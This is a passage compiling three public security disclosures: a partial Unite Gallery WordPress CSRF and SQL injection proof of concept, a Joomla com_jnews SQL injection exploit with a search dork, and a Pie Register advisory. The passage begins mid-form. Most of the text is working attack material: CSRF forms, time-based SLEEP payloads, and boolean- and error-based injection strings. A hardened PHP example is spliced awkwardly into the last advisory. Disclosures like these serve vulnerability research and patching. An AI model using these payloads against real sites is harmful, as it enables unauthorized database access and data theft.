value='true' />
<input type="hidden" name="data[params][lightbox_numbers_size]" value='14'
/>
<input type="hidden" name="data[params][lightbox_numbers_color]"
value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_show_textpanel]"
value='true' />
<input type="hidden" name="data[params][lightbox_textpanel_width]"
value='550' />
<input type="hidden" name="data[params][lightbox_textpanel_source]"
value='title' />
<input type="hidden" name="data[params][lightbox_textpanel_title_color]"
value='#e5e5e5' />
<input type="hidden"
name="data[params][lightbox_textpanel_title_text_align]" value='left' />
<input type="hidden"
name="data[params][lightbox_textpanel_title_font_size]" value='14' />
<input type="hidden" name="data[params][lightbox_textpanel_title_bold]"
value='false' />
<input type="hidden" name="data[params][lightbox_compact_overlay_opacity]"
value='0.6' />
<input type="hidden" name="data[params][lightbox_compact_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][lightbox_arrows_position]"
value='sides' />
<input type="hidden" name="data[params][lightbox_arrows_inside_alwayson]"
value='false' />
<input type="hidden" name="data[params][lightbox_compact_show_numbers]"
value='true' />
<input type="hidden" name="data[params][lightbox_compact_numbers_size]"
value='14' />
<input type="hidden" name="data[params][lightbox_compact_numbers_color]"
value='#e5e5e5' />
<input type="hidden"
name="data[params][lightbox_compact_numbers_padding_top]" value='7' />
<input type="hidden"
name="data[params][lightbox_compact_numbers_padding_right]" value='5' />
<input type="hidden" name="data[params][lightbox_compact_show_textpanel]"
value='true' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_source]"
value='title' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_color]" value='#e5e5e5'
/>
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_font_size]" value='14'
/>
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_bold]" value='false' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_top]" value='5' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_left]" value='10' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_right]" value='10' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border]" value='true' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_width]" value='10'
/>
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_color]"
value='#ffffff' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_radius]" value='0'
/>
<input type="hidden"
name="data[params][lightbox_compact_slider_image_shadow]" value='true' />
<input type="hidden" name="data[params][include_jquery]" value='true' />
<input type="hidden" name="data[params][js_to_body]" value='false' />
<input type="hidden" name="data[params][compress_output]" value='false' />
<input type="hidden" name="data[params][gallery_debug_errors]"
value='false' />
 
<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
(SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>
 
<p>CSRF - Add Items</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='add_item' />
<input type="hidden" name="gallery_type" value='' />
<input type="hidden" name="data[type]" value='html5video' />
<input type="hidden" name="data[title]" value='test' />
<input type="hidden" name="data[description]" value='' />
<input type="hidden" name="data[urlImage]" value='' />
<input type="hidden" name="data[urlThumb]" value='' />
<input type="hidden" name="data[urlVideo_mp4]" value='
http://video-js.zencoder.com/oceans-clip.mp4' />
<input type="hidden" name="data[urlVideo_webm]" value='
http://video-js.zencoder.com/oceans-clip.webm' />
<input type="hidden" name="data[urlVideo_ogv]" value='
http://video-js.zencoder.com/oceans-clip.ogv' />
<input type="hidden" name="data[catID]" value='4' />
<input type="submit" value="submit" />
</form>
 
<p>CSRF + SQLi - Retrieve Items (Edit Settings - Items Tab)</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='get_cat_items' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[catID]" value='3' />
 
<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
(SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>
 
<p> CSRF + SQLi - Action buttons</p>
<ul>
<li>
<a href="
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
">
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
</a></li>
<li>
<a href="
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
">
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
</a>
</li>
</ul>
</body>
</html>
 
## Solution:
 
Upgrade to v1.5 or higher
 
## Disclosure Timeline:
 
2015-06-06 - Discovered. Reported to developer.
2015-06-10 - Updated version released.
2015-07-25 - Publishing disclosure on FD mailing list
 
## Disclaimer:
 
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.


Joomla JNews SQL Injection

# Description of the component:
Reach, engage and delight more customers with newsletters, auto-responders or campaign management.
 
##################################################################################################
# Exploit Title: [Joomla component com_jnews - SQL injection]
# Google Dork: [inurl:option=com_jnews]
# Date: [2015-10-29]
# Exploit Author: [Omer Ramić]
# Twitter: https://twitter.com/sp_omer
# Vendor Homepage: [http://www.joobi.co/]
# Software Link: [http://www.joobi.co/index.php?option=com_content&view=article&id=8652&Itemid=3031]
# Version: [8.5.1] & probably all prior
# Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
##################################################################################################
 
#Vulnerable POST parameter:
Parameter_1: sub_list_id[1] (This parameter needs to be URL-encoded when exploited, as sub_list_id%5B1%5D)
 
#The vulnerable parameter is within the following request:
 
POST /joomlatest/index.php?option=com_jnews HTTP/1.1
Host: 192.168.0.10
User-Agent: Hidden-user-agent-version
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://192.168.0.10/joomlatest/index.php?option=com_jnews&view=subscribe&act=subone&Itemid=206
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
 
Itemid=188&name=asdf&email=asdf%40asdf.com
&receive_html=0&timezone=00%3A00%3A00&confirmed=1&subscribed%5B1%5D=0&sub_list_id%5B1%5D=1&acc_level%5B1%5D=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
 
 
#Vector:
sub_list_id%5B1%5D=1[SQLi]
 
 
POC_1: boolean-based blind
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1
RLIKE (SELECT (CASE WHEN (7097=7097) THEN 1 ELSE 0x28
END))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
 
POC_2: error-based
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1
AND EXTRACTVALUE(8483,CONCAT(0x5c,0x716b787671,(SELECT
(ELT(8483=8483,1))),0x716b786b71))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
 
POC_3: AND/OR time-based blind
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=(SELECT
* FROM
(SELECT(SLEEP(5)))Qrax)&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
 
 
 
###################################
# Greets to Palestine from Bosnia          #
###################################
 
Good Luck ^__^


WordPress Pie Register 2.0.18 SQL Injection

Details
================
Software: Pie Register
Version: 2.0.18
Homepage: https://github.com/GTSolutions/Pie-Register
CVE: CVE-2015-7682 (Pending)
CVSS: 3.5 (Low; AV:N/AC:M/Au:S/C:P/I:N/A:N)
CWE: CWE-89
 
Description
================
Two blind SQL injection vulnerabilities in Pie Register 2.0.18 allow SQL injection by admins leading to loss of database confidentiality. Pie Register is a WordPress plugin with over 10,000 active installs.
 
Vulnerabilities
================
The vulnerabilities are due to the unsanitized POST parameters invitaion_code_bulk_option and invi_del_id:
 
Injection 1:
From pie-register/pie-register.php:
576: $this->delete_invitation_codes($_POST['select_invitaion_code_bulk_option']);
. . .
3521: $sql = "DELETE FROM `$codetable` WHERE `id` IN ( ".$ids." )";
 
Injection 2:
From pie-register/pie-register.php:
1941: if($wpdb->query("DELETE FROM ".$codetable." WHERE id = ".$_POST['invi_del_id']))
 
Proof of concept
================
URL: http://localhost/wordpress/wp-admin/admin.php?page=pie-invitation-codes
 
Injection 1:
POST data:
select_invitaion_code_bulk_option=1)%20OR%20SLEEP(15)%3d0%20LIMIT%201--&invitaion_code_bulk_option=delete&btn_submit_invitaion_code_bulk_option=Apply
 
Injection 2:
POST data:
piereg_invitation_nonce=66e7e6383d&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dpie-invitation-codes&invi_del_id=1%20OR%20SLEEP(15)%3d0%20LIMIT%201--
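Hardened versions of the two delete paths quoted above, as an added example that is not Pie Register's own code. The interesting part is Injection 1: the id list for `IN (...)` is still built dynamically, but one %d placeholder is generated per id so that every element is bound through wpdb::prepare. The table name, the nonce action 'piereg_invitation' (the PoC for Injection 2 shows a piereg_invitation_nonce field) and the comma-separated list format for the bulk action are assumptions.

```php
<?php
// Added example, not Pie Register's code. Table name, nonce action and the
// bulk list format are assumed.

function pr_example_delete_codes(array $ids) {
    global $wpdb;
    $codetable = $wpdb->prefix . 'pieregister_invitation_codes';   // assumed
    // Every id is forced to a positive integer: "1) OR SLEEP(15)=0 LIMIT 1--"
    // becomes 1, and empty or non-numeric entries are dropped.
    $ids = array_values(array_filter(array_map('absint', $ids)));
    if (empty($ids)) {
        return 0;
    }
    // One %d per id, e.g. "%d, %d, %d" for three ids; wpdb::prepare accepts the
    // values as a single array argument.
    $placeholders = implode(', ', array_fill(0, count($ids), '%d'));
    $sql = $wpdb->prepare(
        "DELETE FROM `{$codetable}` WHERE `id` IN ({$placeholders})",
        $ids
    );
    return $wpdb->query($sql);
}

function pr_example_handle_requests() {
    if (!isset($_POST['piereg_invitation_nonce'])) {
        return;
    }
    // Nonce plus capability check before either delete path is reached.
    check_admin_referer('piereg_invitation', 'piereg_invitation_nonce');
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.', '', array('response' => 403));
    }
    // Injection 1: bulk delete of the selected codes.
    if (isset($_POST['invitaion_code_bulk_option'])
        && $_POST['invitaion_code_bulk_option'] === 'delete'
        && isset($_POST['select_invitaion_code_bulk_option'])) {
        $selected = $_POST['select_invitaion_code_bulk_option'];
        $list = is_array($selected) ? $selected : explode(',', (string) $selected);
        pr_example_delete_codes($list);
    }
    // Injection 2: single delete goes through the same integer-only path.
    if (isset($_POST['invi_del_id'])) {
        pr_example_delete_codes(array($_POST['invi_del_id']));
    }
}
add_action('admin_init', 'pr_example_handle_requests');
```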
 
Remediation
================
Upgrade the plugin to version 2.0.19 or higher.
 
Timeline
================
2015-09-23: Discovered
2015-09-24: Contacted vendor via website support form
2015-09-28: Vendor supplied security contact email
2015-09-28: Requested CVE
2015-09-30: Report sent to vendor and wordpress.org
2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed
2015-10-12: Public Disclosure
 
References
================
[1] http://codex.wordpress.org/Class_Reference/wpdb#Protect_Queries_Against_SQL_Injection_Attacks
 
Discovered by
================
David Moore @grajagandev

